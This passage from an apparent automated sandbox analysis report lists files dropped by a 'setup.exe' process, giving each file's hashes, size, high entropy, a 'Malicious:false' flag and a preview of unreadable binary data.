              SHA-512:9384D0083BB3FB97BD06DBB11A74C805BCF78EFA3D4948FBC4225147EEF2A704B6E363493AC3DF4CCAD31E8866D2FFEA6276A080555EFDC857392C8A3D34F160
              Malicious:false
              Preview:<?xml!..."=G..H....y]..l$t..'x'.G....I.GAq.X`z.....8..)Dz...0.UX.J.)..3.d...n..m9..:u.:.]..../...G.s_.R...0.|J.).....~.*xm....'.......,z.RIy.Np5.........@./aW..m!".Oh..o.o\.E...esd.A...H.%[!<.`qjU.m(..\.U.;.......$u......5.*{$..K{..7......P..}..7.............{..%.6\.0['...A.vb.=.r....N.Q.18..M/............s.....~...O~..Rs...uD`.H..I..<+.Q.F....)......[Z..1U[.H].v.~...xJ.7J.F..^D.....x.T{...[z.......}t..MX..Co6T....BN..F..tT...a./U._.vi...-xe:.7.~..%<..W.._U......MF.1....3.6.@.I.@..p.;.R/.e..W>....*...]...4.r}s..h......~.O.^c....".....<P.V2OStt;...v...`......F......ry...1..Zb.....S...V1...x...~...e........|s..'..yD.]....MBcP.{&\hH..e.oC'A..w...+.$.,....Lm.l1.Lg`...'.}.mk>...)2.....J00.!......j.I....`^..).........T....Vesam......w...t...l...n.....oT..=..+9......"....^..C@.Y........n...:.....I...P*JL.j.h.F..>xq.....`.nS3.5.z....=..1\.0vTv..fx%.!......3.. .1 o......).......>oF[4.....E.1x.9.-....6..G.b..OrL.].% 7.}.\....R..k..7U
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1702
              Entropy (8bit):7.887218828069222
              Encrypted:false
              SSDEEP:24:9NNj+vPc/LyIYN/VMVf3/FyGr/Ev+79g1me+6TE2KRCIIMFgcFwDsV9FFbD:9N1+ijBtb74+7q1me+6jHWlwAVHVD
              MD5:F239A2FEECCC61DC5451FF4D19B4005B
              SHA1:26193FF77C5BF766249A72D85635D50574AEBFB1
              SHA-256:105F4B9A1D2C736567F26A29FD30ABDE56555EB3BCAE27EB4C35726A3964287E
              SHA-512:286427023B3531A80A6EE3A6E39D0BF74330C5AAA1AD14A67B3F1B83C0768D79EBDD312252653B10ACECC8641D8DD1FFA6E45855B91AE30B31355D01E8DCA969
              Malicious:false
              Preview:<?xmlZ.ilX..=i. .V..g./.h@..(..a..T}g.b(......d..H........./...4...\.....z.nk.b9.yI.T..I.J.u..wP......=1.>.[....p-.H.{....+.z...K.....-.t.t.51.}A"8.`X..E.....&)...JA...,..f.k..o..........K..ya.A.}aU~......o..M'.y......2....h;....#....K,.{..?.,#...]3...(6....o$~.;X...~R..[.VKV:.''..<......B.2..L..S..o....t.eD.=.F..:9...X.5fc{;.....q.X.4....1v.{.~.............(...W^O..'...{...p.(3`[ .....$..q..'L|.8qp..k;i...w-(..1..K2.......e2.Z.UX...to...(.H............G)..}.....Y.M...>.Vu3..s.....s.....e...;.O.~.[.}U..f.u............J...(.....j.{..6...S.=...+.].rpb.0k.Z.4m.[h..F.7A.8d........f..Ct.#....I......[.....].V./..>.>v.F.;..u...Z&..'&AX.d..v.T..5...@.=CX.m...d&...B...\ ..Q#....t..Y....c...f..F..!h.$.0...2.C.i..E=P.....S.e..yJ.A.[..5........+..d..X.k.'.hm..?.l...L..B.hz..\ql.../.....T%..y.v.:a.M<....a&......:...4i.r.R&'(x.a..?/.../1.!..:....Yt...........],?V,.1;7Q.`..z.........IF."i4...+.....#..`-....M.p.3.............P./..t...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1739
              Entropy (8bit):7.885258779942766
              Encrypted:false
              SSDEEP:48:jLtKiU7PPfBm6A2IPDNl9AyWIrUxYHdHXqaauyD:jL27PPfBmp2IPhF/rUCdHX5a
              MD5:370C86A1A3FA6E4D40A52199507DC774
              SHA1:0AAC7EC3D9178B866C452014548F660A553B69D7
              SHA-256:164ACA78A05D9AD9C5692BD5BE0EB857BB3138BC3A7A9A3F4B8FCEE200D0FECC
              SHA-512:1F9DD85F1C292E332EDD98DFB10A7B5608D0742F92D84DCE59093BA1CE73825647B04FBB7D0D883822D047878D61220B2DFECEEE93F75FF5B513AF821AC841DF
              Malicious:false
              Preview:<?xml.......=}Et.^.FbG."f...aQ.....4...u....(.p....R.....>c.%>...7O.'H..x).-.G..w..Ch......z*.....Qf.V._.5dT}..CWP.lC.. ,../@..8....z..d`G"....Y2.....Z'B....n8|h8.GPP./.P6.n([.2.m=c.....H.u.n......-.Hp_...eC.L........#.AL.w3..Z....d.$...p..G..P.C9.v.t317....zk]...q....r..@.k....xI.{:".sS.]#.{..9VV........|...;.W.-..5..b!.4..@.......:......@@.ON.{3>.....z..%C...=>.../.8.(..|HNS.x.G./<....6....Y..[...!............g...!z.+..........7.S.(/U4.P.{.}p<3..{....ml6..s.3....~-.;\.8.....U.....)....#..W.+....@s.....9..>=u....q.....*.8I..C...P............ESwr.b,..`L..j..+%r"8.O.]8.O.`d.u....$#....|.....]@-...A.....y`. r.#......i..r.7......v.aM.w.SW...=.o.....N..h.'.H5nWS.p.S.a7CY.A.o......3.k.*...X..'Y`iP|.2....2...j....pvm......p.(..^...T.w.S..B.E..J.JQ..*.vx.E.^.oZ......8W.w>e.V&.......t.TO..F...h...X|..h..W+q..?..@.G~.....^..'.o....%PFn.D`.X..w....;...\..oG...z:.5........WR..ok...-...L..N.ae..O.}.........U#....E......4.I..........
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1695
              Entropy (8bit):7.882147472590201
              Encrypted:false
              SSDEEP:24:0J4/n/NW5n5tMdVZjNF6dlIgANzXSNsID2Lp88Lfu/ZJNFFBHALEaTSbD:0Je/N2vQQdlILzXdBpg/ZJXAL1AD
              MD5:9C41E8870C36D125AD211424F5371B67
              SHA1:0BADCEA3778653601EBA19BDEFF511E0271CCB7B
              SHA-256:9E4D275DFC839C5E0189677F606CD54E94C7B9F4F61DFED1C0010DD4F0DDD5F5
              SHA-512:988B3F788B861713700346E1C991C0CE8778F031AB4C1A2CF99A8FB6656C0603BF2FA6F8620C7C51A4773204A965A495B11C5874B50B488FA871DFA876130443
              Malicious:false
              Preview:<?xml.r.a..AS..S.....1..<...... \..C....7B..Hc8.B.[..w...K.5...3.~#..M..=.S..+.B.....bjO#,.{@A...".li.........U...-....h..c.3.M.R(.~....u......x...... ..69...].l.N\.....M.I.hZB..D..(..K.%.....G...A%>InX.:/L.].i4l..>.}3...5Xr.j...6<...............e..|....Wq..G,.7D$........$.....nX.p.....W.......4..=C...`..-<S.GK0...{.Z...y.......ykY-V......p"..L....g7....X..+R;.[(/.....y...t._h..t.g..G}..H.G.dD{.0Yt.jI 4G....?.....Raq.....Y>....FMW.D_.V9...2..h....h..c...M.q...;o.X.....w..%....F...].Io;*.;..b.J..i|.!#|K.C.....{2...y...i..n..D..v.p...l5.|.#....>d...D.}.B...m....7.....ak....I... ...-:...&...%%.9..:.#......%...~U...,...I..3A%...7..k..........j..u....E.N.].u..R.q...Q..c|y..c.x.....w.o.%9(*...d.&....!..sl.mp.....vE.5q|....?.!.(..C_.t...;.|.......P..%&.L.kX.H;..K\.FT..m.g..N..7.b(.B...PN'b.<+...+........P@..s..^=&a{. 4^7e8;`.2...*..0.M~..W..k[...0:@.C.@h.e..q..%i.d.........Vm......*..q....z.}......tY...7..f..}..T#..l&1zG..hx...u.Ot>.m....{.....So...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.868786288195687
              Encrypted:false
              SSDEEP:48:VKW2bhmOY8wmK7bItwd+C7O9DWe673MJ8/WOf1cknf+fD:VKdbA+IfI0HO9r6heY1ckn2L
              MD5:5A9CC2D8FDE67921DC7978FA87D3939B
              SHA1:FC5A7FB4E4A6C63A8D4F9845D0D2E6E9A5CC3983
              SHA-256:86D46D263FC5D599C0BF3AC97244F905C13A337E3EEB6043E5C78CBBCB4BF4A6
              SHA-512:509727DC518B6CB68C288764FD0FEC6FA64E03037CA2B75AA99AAE7FF5798B9EC3B6D09EB0B0D32C505CE9AE19B57E92C4309A138EB9AD608F4EF30ED3A1D175
              Malicious:false
              Preview:<?xml.d..yMH...CJ..?.._.|.L.x.D!.z......D)....7.......F..i.6.7.c..b.H .<.~.....m*............i.T.....R..^.1...!.A..K...r........z.-).c...k......SD4...Cc.A.}[Q.=..w}...E.$...*T..b.b....i;...o]n.=...J.....QP....Jv";..A.2..W<...=...V....'b..:.ZA....nP..HT~>....n..._.:..NY.>..N.3....V.......`.3...St!r..f...{. ...>._a.&|{0.,..u..1....?..R&CH6k%i.4.>..._.[..v$...W_..7...!..ff../K{...r,...u. 3$7v.*K..i..S.....3y..\;...a....B.Q.y.Z.Y..a.[....X...q............Rz`y'.C.>.....5#..E.<.Vo..Fb.uI...j...P1{,..K.<.G......r..U..0..e\.-..{.."3K.tr.O{.A....X.....w.:.D.....`."..|.K..>d. ...V..E.D.D$>....ZW...O,..,@jNGm.tn...PZ..'...!....(.XJ........0..H........[....Q+.m"*.....S.F."t..1.ZG.}..G..!.C3cCQA..a3q......f..m...L8.9D..F>..of~..b......t..,...$2._.O3})y.c...........x....#I.\].....v.*..hb...F.P...6g....R......n......C...J..._b....U.Z...u|.Kz0.vF..|6..O.8I....Z.e......\cz.K...CY..u...oe@(.....0..G..U.)..h.-.~.....h.s.."...#...4.$..2>$...a5D.4i.u
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1707
              Entropy (8bit):7.885396748960309
              Encrypted:false
              SSDEEP:48:FHyqOQt2TCg9Lc3JWle1fY3oe0WQSG9uCD:FEp6Oba7
              MD5:3666C653D4D8E8918F7FA688E560B94C
              SHA1:E9B4EBC068C43CB89AAD66DD035FA87A7E8DB8EA
              SHA-256:DABF232E9090CAEF00BC5C5992E3B41F491A79DC55DF84F2EA62F0F72C7230AB
              SHA-512:90182E6380B18D474E805C93D84F155473F3A74FF28792E435D0FECEAA81A43FCDF17FE9FC53828D2748DD5C5D9A64CF2FF25942478CEA6C109D66DBECD23C50
              Malicious:false
              Preview:<?xml...H....#...IX...a. 0.;.......o.<.v.....b......9.C.....&._h$.~|.%x..H4..g..#?.n....A...6..;.A..E%.....p*.%.{...{uw..8.K"Qn.......,...VWi?.4..=.]\3...JM.8.3b.#.$^Z.:...k.X......j.&|n!..IXd..*RB...5....C....`...y/...}yt..O.....7r..6cl.0..}.....Y.D #.~a>R.....i.w..:..5...)?..a.....d..:A..~....b@s.c&Lt...*>.?..!].#vF*.....5b..........G..x...........G.J.....H.,..vx..I....0.P/..#.,h<..rZ.6....[.....Z.I=i.t.<...X.T....8..Wz..1...L...;m..h....Zy|..1..T..]Ao{...nb....N...i.7h.=)J....%......i?....k..z...s}.0^.\...4.6.$...9.OFOr..#.E)..3j4sr.......${V......?......&f..>..;Sr.....^&..1.@.y.."..o..........Kdk.M.%w.....,b.QL...e..'...<.2..X.QK.!.y.....>=.?...y.2wz....B|E[.0..?^.A/..H...:gR..T..&..*[ .'......b..g.M.-cZ.....gTF..2...P!.&1-.?y.c.:.......C...^H. ......K..j.fO...a..V......;t..s6>........\.c.d..._..s..vx50..G...l+.j.vn.MZ.,...%.../..e/n...@.m.....|M.:...a$.y...~'(7E..........T^.J.t..|tC>....aP>-..T.r..5...3....h...n....N.z.-B.....F..Dm../.=.Kjz
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1744
              Entropy (8bit):7.90093350599127
              Encrypted:false
              SSDEEP:48:EZ8LOYrEnkP/GHWyM+EB4fSFTzitpMQy0g96ED:E21qkP+H2BEqTzitOn
              MD5:7D079AD02B5967E531348007F8501213
              SHA1:D7267C350F8401A685B3416D6D32A7B6538403DE
              SHA-256:22F8D95CA77168717DCA941C8039570759032DD9E3BB9DC0DF98C81E97DD1D2C
              SHA-512:78718A0F4168DEB9073C044D3E0424BD41B721FB1AB4B364FA1F89091F6A10CD1FE33FA7AD60B4C03D5CCBE5DB1339015FCCAA587D0924F39F2EE44355DC5C83
              Malicious:false
              Preview:<?xml"x.....P.&...6..w.'..L...~..".G..E..i...6g...v".....].>...w.m f.U.(.T..........:..t..MX.X.9.?...hp..1w.[...|L..|C.I...f5pue.O...!5E.......@..$.jUi./~pj..BW....'.....!....|.H\...S.....RW.%..:.?"l..J.Yv.$..-...@.....$....,.-...`..Q<#3o8..V*[..I...%p.\x6.......p.7.J".,p.x.w`[.y....!......d..../......R4....a..2.8s..<....^;.*.k...&.)..5t.j-,.`..x..g.wQ0jFj....[.7q..8A.x.....'.7...\..E....'d...A..nxP.....z..7."....6...j.q..8..........N.v.j.%=F0$....9.qc~,.}../A..2.-O..K..T._..<...]a.[..f.Y......]....5..F.U.2d.z..N.....Z_..s...)....c......R;61.....hN>.|....HW:S3+q..c..M....Y.X..*[.X.........W&.$.....>c...F...P..>(.w..E...Ge.2. .v#`.*..[#.rg.D.0...E.;.....d+....=.......E.}6K.l*...D.*.N.e..".>.k...R........3...O..z.LW.tk.V..2..Yi....n....8.'.....L{.$.{.^..eNkv..`..1....sQ..bk...G.....b..u..............TWrr:.Q....p.Q29..ce.t..d.aH.....[..(.y....u..#....39W.RBw.c.J.U...uje.}.;..T...E..6.P.&)..C.|....k..9.....u".<.........^....Fr]j?.`..59......?)...,.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1697
              Entropy (8bit):7.873038273010998
              Encrypted:false
              SSDEEP:24:dLgbOe1yGlsdX3umTK8gA7s1vGtQYUmrasAP4W5S5wyx0LBBi82ZHv7aDD1DbcbD:dcbOpdnm4OvJuk5CFx0/6FsDb2D
              MD5:12F08D98738B64067016C219D2B26C6A
              SHA1:F6E43099A3C0881EF8B17EAA6CED4DD7B2DA5796
              SHA-256:101F9860F581E2B7D432A0044C468E33475B842E1E4FF39E24848444A39E0E88
              SHA-512:2F32472105D52D3AC37559B1AA6A19C3680C59D6D0B70C8DB83C70F306023974DDE516501D1767EBE6E327484F5A6EC663327FCC41E378E75877E00728CE1A72
              Malicious:false
              Preview:<?xml..=..........x.}.:.N<...-..J.x{......H.[..c..k.d.-P.. I....}.....D=.Iqm)Nyf+..p..c1.R..z......It.i..#?.5<.|*.o..7:..._Uq.q.........R|y.`.E..;.:).N...v.`.........%H.R.`.......R..X5.PJ1.....D.7....esm.0.n.$...y.A....*...3....!MT..;r.}....6sR%.l..6%...4..5AH.WP^..+.....w.e.d;..G.=..7c..UG.J8..-..rJ.......,..ER......<.n..K.zY.Ns4?J...."...?.^...]40.t._R].......0b+..t)3.....;....)d._..*..nr..u.P......y....'...:....4..{}.........a......UR.t.......#..q.'..qA..9=.3..Pz.q.....r..[.....=..2b:*U.R..v.....K..%=...V.y.1=Q&.s..8I/....n..@.#.~W.a~.>,#...~.1.P.W.Q...F.o...\.d...nbN...'...;.......r.:..I.....+.....*E.........$.[.9rDtw.}..%...t.%....Z..e............f..!'..*...1c../m.|..c..1......;t...g......}..s.F7UPQZ%.n.u.C\>.. UC.]}.....m.I"...G..0...(.w.....k..Us.D.D.7.>.l.....s.s....b:.....v.........bf..Z..m..r.......+..[.......u2.|.Ev....^..8a.G{5S..E..m...x....{l....b;C.....^@....;...M<.E..v:e.&v.@~.....L$.j...o.J.2..9...A.5......^....S.s.+g.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1734
              Entropy (8bit):7.885543054144506
              Encrypted:false
              SSDEEP:48:sPJbKjpP0EAn49qhB/yVnG0vyt7VMPDr7hoGIoBiD:cJynAneIB6VnGQEUThZdq
              MD5:11755A1C9DB7CDCABAF52A72595422C7
              SHA1:7A9BA29442CB2B32E59CDDAA5E77CB39396CF50E
              SHA-256:4FC4AD2416FC311E4D690EF7207A70D93972C2205ED9336F656DAFDAE7CEC246
              SHA-512:F46F65A919E6505C31A2126A73F92E6324D9A6FFF527C85EC96088030280B47055DE791ECF9F469D5B0537A047F884418ED3DF7F0DEEB863F630C02D63BF04B1
              Malicious:false
              Preview:<?xml...C...5.&.. i...f...u..F.N@.'.~.k..........$..u.In.....M......t..x.....a.._..D*.1&..0.-...u,...E<d..,.'..N...._T......@v..h..d;.7&.4Aj3'..@..3..u|.^...$.,...v")y..{U-a.-g..:..H....r6o..e#W9.e8...`....U@.....X..2.r...l.....h"V~..1.`...P..,V..E!s.......1._.;..VU.r.r.X.).......B....%l..i'.......L..t....!$.qb."`..)>v.(...9.v......V.W...j.>..!.K..L.U.uC.#..LX.bk.....4.........~.a'M..]......F..O..d..4....\....`.*..O.Zm\.`......l...5.'mS.O..,.#..&%L..h.........,v...........{.9:...n.h'Q.';....J.g....o..Y.~Bk.,..3..m...f.[OL.d.3...c.^....~j..t..2.E"......n..$....P..3.iN.9...n..P...P..zI.$#.....l.-R.%"c.Z.7Q....a...Ve..qr.Q....0H.5hz......8..y._1.?s.<.|~....;..bi.L.A...5.9.....?d._.........W/.....oW...-.h.fW...*V.q.~..M,%..7".....p.`i..z..X%.p.5...*.+...D.us.qe....<.1.......|.f..0.S...>..HX.!.>U.P..s:...l.(...<..r:@"?..W.).o..|.3W..=.*C...Tz..h.).=}.C{.^.....Rb.5..+..1..z......T.9..w..g.M7.L'..K<..?..~.:z;.8<.$..........Z#'r{._.Q.Z...s
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1689
              Entropy (8bit):7.888794196668122
              Encrypted:false
              SSDEEP:24:op8wB6TvRUHdsdgUPNhyAsOVJyqbRRRUYIA40XIj5wSHydscEJ+EAbD:opj3LU1hyAsOVJyQKYI70XO5FSsaD
              MD5:1354B8B9C5F2CF9E03F016AA10F68C48
              SHA1:1406CAF11858385E5E878B9080F34CE122C30D9F
              SHA-256:1F3DD96D52C1A445D26C88ABDA1D45C0CDFD07BE45BBDF78A35E42C30C2DFC08
              SHA-512:81961C0AF8FD98357A41FCA7B46270CE6189327C5EBD5A00F56267725D08D8FE83A3FB11F55D1CFC56630B4C5F102F510B2DC8361A164143EBA50CE4944B6A9E
              Malicious:false
              Preview:<?xml.I9...P.i...../..>.q..^...n......Y.j..Dh.n.U..^..C.{.&.\...P=.2..;.A*U...2....h..g.y..x}.m1.......73mmn.=..J.M..x1..8..v..Y.yj.GnA.....a.d...&............\..4...YRW.g~[.U..:Wn....{W....c}.k.....$`w>\a6...3,H.)3dZzQ..o/.BKi..Bx...7....sQ.......".MtG.^0.^..VL./...D......8.P.XiL.7..!o...B.|}.b.,..&..'|....vz..fO?V@8..........M...... ZOK.81...xC.T&...9.....F...%B......_.....k..M..\..Z.0......0..S....WNd ...M..i_.N.;T..N.{e...'....e..6..lL..F.........A......Ze..R...W.P............i..T.x.$`WF..y.Tb.%J./-"*Z.....W....>4EqM.u%.k[....2...]........{;.2...?..~.j.............{...,..]L%.^l.......Z}.S.1.W.{*...Bf.0<.9}....*@.^i..Y:....,Y.....`..X.E....2..*.[).s2L"fd.aqT..qDOBT).t._@E<......|E.....T..u.P..{.....2@......%..7....].=- T......]H.(WI.&a8\.....%[....".....hJ.M..:...G.........W..........s..............*..YA8... .w.....d=/..Y..~...@..s.O.....rL/K..`...........}m..=...8.6O.MA._...s\P.SZ.-.F.}s.:...)....J..b.!..g3.d._..Y........a..C...X{...b
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1726
              Entropy (8bit):7.887333436422135
              Encrypted:false
              SSDEEP:48:trzCRcza4WbqxD5+QnJJAkyc1NwibpcjALD:ccPWbqxD5fJi/obpccn
              MD5:7B2F698CF43184C9834BEAF26572FC88
              SHA1:9012AF7F160ABB56CA827CB6B0DE685A7BC05366
              SHA-256:DCA28EE10D38B3ABCE8A53047875D9F5CF52C21062383C7D2955BCFD43CC1EFE
              SHA-512:180B9B466A65BB404BF74388932B323B34D2086EC57D9410F6C2CB03762CC8F5D49748297CAA1904379719016504A3E7A24B073DB2FCAC427ACA5DC6B4003D7E
              Malicious:false
              Preview:<?xml....7..xX7.d"C...ms.Y.!.0.~`.....*|].tg...A..gg.i;n%).O...hUuNi....`.f.'(*N..k2...rp.p?K3.8..c...C.#......nL...A...Q.){j`......ft.Z...'...,..E...N}i.....Y.Q..f=.....K...@..U.~wc).R:<....dY..o.=......U..~s....\+n.......D.Ze......R..SK...Z.!....g~i.L....e..]Z\..e?.g.Q3..(......B.?.....,....{....F..._..B.....`.VZ."..M.2J....{.xL.0.;...^..d...kC/..l8...H......O[UD......}m.~<.....Y..y.)..b...t.w.........A.p....}_.;...B..(2.#..*_-.~/.;..D).5...z.....h.[CE...a.."M........w.}>p.....`.......-...:..I.l=.r.T?..(....d.....e[...0....l\...a}}/R.....^F..'.TJ..=....YEd..(...%i...^.>..4..Ce.Sp.~...ES;..@n.KM...>.1Z.9..1.E...?....%)..,tN..L........hi..d3Z..j.2........c.E.y9.......l...0....}~."gz..h..7..1....S2.....Pp..%j=U. ,..#..t..0.Q...5..pL......6......j1=...7'.3.9..CE.....q...<h.9..u6././..X?a;ix.[...(...;c2..."..R.q:'..)B...y...XH...-.`.......w..d.(G.u...m.^...^.ob.g...%.......~.......B.....HT...,....U..V...%`....1.....P....S..2EH..+<...X(...z.>V.=->q.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1691
              Entropy (8bit):7.858856503517762
              Encrypted:false
              SSDEEP:24:4X6ve3NfiI5MgXVDzbleCgjMSMWY0SZj8bCO5cHbfdilbQwFkrWHruQbNqCJf1r6:eQ4zMozb8HMSMJZjgzIJPoLNZqKh6xD
              MD5:B8D8722A6A175C9F89D93D17041485CC
              SHA1:AD5CA7C4CB19E42A940AD732C22741723F3202F7
              SHA-256:77409D5A96264936C66C3CDB8CD115DEA5087B3CE2621A3B4AEAA6D0B9FE6052
              SHA-512:BF1C96D06A6C9C0FB9CB265E0EA25F36D8EDFFEA491085535170390CF421FCAC41635545301014151B481BA076D66F62969FE3C71E675CABB781F9C2865AD41A
              Malicious:false
              Preview:<?xmlE..4U.......G(7........?ZA.}O.S..#.b..2.]|t.W..s....I.4...T:^..S.P.+.P.|.G.......I9.Q`.o.KeS..V.t#.'.h....z.|o+0...j.b..+.\,u..4..7@6.o...:?.p!p{..v.&.&&....m.j+J3......|.A......#...5..3~=......^......u...H]._9.....?"4...~....vw..S......3..4p}.4B.|b..W.kj.H).8H.{.......M.(.%:..._...&....B...@..C....!...}1e.'Z..0..BDM[);~..d;.b%E..^...}Y2...Lmd.'lY.r..1j.U.W.....q.1.!.6G..n.?.t7.dK`Y..._^..D.x._..b....`...\.........h....1=.!.0"@.n@.].x|a.T..".a....T..K....rml.).."X..M..]@...PrP.B......U...F_...OX..I."..q..t"...v..X.-.K.)piu.......\p..Bp..r.93EH..,...)f.rh9..`!..^F}S.X......v.....3Nq.U.......`U./.cbU}I0D7..Wu...`G.{N..I...$.Oz1.P..~I..si..a.G.B.y.\...l=..Lh.'...7!.G....V~a<...b!6...\..H4...w.YF.4....=Q.j<#Td.z.I..x.N{..G./Yk..*.v......W.9.0.=E..'B.15.?......^.'i,......A.>.y..w...o/b=.\:.E/.Z.E.R..84.{..f..T.{.2..S..u|....y._Z.\.M.zn....r..3...."&HY..".l.....|;Y{.{...v K...........0.E+LfB....Z.W2..T(...5..47C.b..A.fM./..$^.hLE....g..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1728
              Entropy (8bit):7.889194868570217
              Encrypted:false
              SSDEEP:48:hqoYuXxhIlAlprtFtInf8I89GTnoY2HAm9p3D:hnYshIC30819GbQgmnz
              MD5:BB2EAA82AF9C639B21D1533F1329B0D5
              SHA1:66A6519A432C055ACB455DCBB384C139D1E26F1A
              SHA-256:33DB4D7203ECFCDA659FAC89BB457E27D1C463D6CE272939349D549750020880
              SHA-512:3C1D8B4FEC5DB1B7255539E5F413AED07FD482154013A7A669F3CFBCF26F570D92B0FAFFFBB0B020350306F3AB32F6417185A9A2A6F2671B582D40BB9D05A745
              Malicious:false
              Preview:<?xml%....>..t..g..TE..G.....Mo . .........J....7...2.RR`...&.5....../...G.;........~...n.D../... ..t.8h.l.J]..A.A.*.}... .7.. ...L<..|$q]...s^.s..v.$|...6...qK..V....2.y......@{...w..|$.s.F..K..$...j...'.w.q.I.,)....kW.f%fb.ps.........L....z..h..fc.C&.7C.Lb:.....7i.N...,`..Sf.m./.QY..3.._N........K....d0...!......X'.u.H2y.C.'~.b.s)d.dx..>.+l.3W5H..l=..9........E.@.+...8...W.o....#.R\g8pT....7Zs.F..F..CL(.2....*......m6...Y..4..7D._.:h..+....a.e_.b..\./i..C...A....&TQ..]Q.......v....{0Kc.!..j.co.N..}.{.G...}.i...SM72.....9...?Z........b...6.l..=gy..o[.W..^$6..km.'..*.j....V..s.F..|oLk.Ep.#.?.Y5g.K`......8..#.SN[+.....cEh.,....7..+.&3k.....G.B..B....4k..'*E...{z.7..&......!d..*..K.*.N....%..I....!4....LR.g.t.I=^.Tie.....rf%....".|.=6H..H.GE#k.-.QL2Zl..O.f./}..t....B..4..a.6 ..w.......k..%\.'.....1L[.d...Q.%.L.s..`.)..d..[.....v..? ....)7.[a.3...g..lp.^..f.SHo.......Y..&............dj.>.[....(.2hG...4x..k.}+v\....xB^.s4....v..t8
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1699
              Entropy (8bit):7.87987912590321
              Encrypted:false
              SSDEEP:24:gE0HLvkAyJirqLIpFx3eQ0ODNO0O/pT6YjQGJ1UcBSSLqUg7z60MmxC00sw3XY86:grL3yUmLIp/3NDY5T6FK1zBzu8ZboTZD
              MD5:35CB4F2F25D4E2786FD2227F753538B6
              SHA1:A6A20499DF1AFBFD9A1D738E44B1810749D58ED5
              SHA-256:5123C4AF8A0C14EB96868D9E157B7DA93FA060BB5036065DB30F81178D72B4EE
              SHA-512:9D9911721CECFFF0FADDAF777865D22F27DF7817AA9FCD535B33E6354E3812234C1F976064695F173D6FC28BC959EE74FE63307FD28AA4EEB72E3DB52AE75436
              Malicious:false
              Preview:<?xml..R........p..d../.....x..n&...5MT.....J%....[iX.V.9..`.....T.?0r..<..2.Z.v..u!(....W|:s;.N&.......M..9.^..e..W.....%..A...,..L..)..O....nJ.n.M.#i.._ ..+..kefP.xh...1.$?.2.....x..P.;...n+..4:..~..9..c...@Vj.B.s....t#B..Y.lI#.Q..l..B.D...K8...&p..d}..%.R..:k.....>V0F.M....tK....zm..\LY.&../.....d...CY.......C...?(.uL.A.2....u0F.k..;...B..gV..z6|.wV......xuV.o....YT$5..`c@.\...|B.7R..._....D...5.dW...w..,.>.{..=4."dJ....KO....9j...nSa#...1....=.R...&...Q*<.T.z.W....R.@.Y...[.Jg...P..F...@^.....G^...^&p..z..v.c..3=R.;.......c...\.]..2...?3..-...d$..K......_D.{|..{o..D`...Q}......0..i.......m9...........@48.......z..j.kF.oXz...(...$....].e.Uj.2|..9....3....\r.<........Z......+x......#..%=....F.-...[.FG.....b..h=o=..%h...y.g.v.._}K.G.=*.......:Ue.^KZ..j.t<.l..E:.G.......7..Q4...._................=..PV...V#..UW._r1).J.Y.~.m...#...\.Z..).B.JL4.;.{..b.[......t.o.S..Jd.R1./...S5....yM..hgY-/X..........W..<O.DQ......[xuQQ....I..^vL.Z!o.;.Qq.yG
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1736
              Entropy (8bit):7.9057795240405815
              Encrypted:false
              SSDEEP:48:qxBvJ0pL9JQYcQb6nW679P3KN/x94AXOIeND:G6pL9JQpD9m/xfXOIe1
              MD5:1C4B932FF223FBCD201518379041E494
              SHA1:430A55D61E1B9A768E4B4AE73C32B1A85A70033A
              SHA-256:7EA9A328CBD9894B78A3CDD466CB3355AD9541CCFEC0B4C07C52C480D0230CEB
              SHA-512:94969A44F2D77EA485D4969821187D87171A765EC453061583150293DD7A7132CE45B1A9E2622390245A265F139C0C9BD4944F3D2005B8232995653CA37790E5
              Malicious:false
              Preview:<?xmlK...~.R.?.U....g.r.+$Is.wU.......}....N....4..E.cs.5...W...tQ.:..T.F........o.b.j...,.l...F/;...q..k...G.T.....*.2... ...>.nm. .(....wEI...B>.....tl[...=...LU....9...n.6.]..U*....`.k-s{....%w.~.a....Y./F.[C...B'.m............T&.].8....P.=.k.....!.x.'B.2A...5..q./~........X[.._..P.....{.}.L..........|@1T\t.Fp"......S......u..kp..#.vs.w...." A..U......f.0F*.....N6.j...C.Yp...x.%.q?LB....L.@tO.\@.~./....2.dF........o_2....\....s<.%.....H..\..g.....-.t<.Zj.......E.2.&..z.$...C.*.T.'\tDO...7.3.%.....T.iwu^.[.V.z7...s.\RV5...R...(;pCZ.L....I...u..4O..>..*mj....!N..}..yt.6N.O.<m...p....`........>.iN..#a.(....:...f...}....|.........n&,.<.-I..b.*....#.8.?+..M..V.rx}...*.!"@...m...b........z.......Y..V...6.U.\...O..zR$.I.0S.I{+.a.O.nT..E..c9... .)4...5..@..I...fa....W......#P$....S..5.udB.:M..e..[..S..S.>....g.....q.[k..5..c.}.A....~d.5H.@.d.....%.v.y7.....A..t...0.={ ...-.<..) .6..+].P.wK....D.. ......Wd..j...Z./..B/.....^...B.{o..+.e...35.c........
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1703
              Entropy (8bit):7.8834616684280086
              Encrypted:false
              SSDEEP:48:ZLnZT0fnic8bsoSxuvvIJHeJ2Xoi0Zm3H4CiExZQD:TIf/hzkvIJHenuHzxZM
              MD5:5DFE94F92F5A7F95120420D8B662FBAB
              SHA1:6B736BD81ACFC185F8DCD36F03925747B226E201
